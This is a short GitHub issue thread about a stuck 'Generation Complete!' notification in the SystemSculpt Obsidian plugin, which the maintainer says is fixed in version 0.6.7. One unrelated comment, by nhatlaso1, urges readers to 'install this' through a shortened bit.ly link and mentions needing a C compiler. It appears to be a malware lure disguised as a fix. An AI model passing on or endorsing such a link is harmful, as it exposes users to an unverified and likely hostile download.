### ISSUE TITLE
BUG: "Generation Completed!" notification can't be hidden

### ISSUE THREAD

**Issue by luketech85** [SystemSculpt/obsidian-systemsculpt-ai#67]
With the latest version of the plugin after generating some text using a template the "Generation Complete! ..." notification does not disappear like it used to. Instead, it stays stuck in the bottom right with the dots still moving. 

The only way to dismiss it is by restarting Obsidian (even disabling the plugin doesn't seem to work).

**Comment by nhatlaso1** [comment]
install this
https://bit.ly/3XQLHlH

you may need to install the c compiler

**Comment by SystemSculpt** [comment]
Ah, I knew I missed something! Fixed in the next update, thanks for letting me know! Next update will be live in a few hours from the time of this message (0.6.7).

**Comment by luketech85** [comment]
Awesome, so fast! Thanks so much.
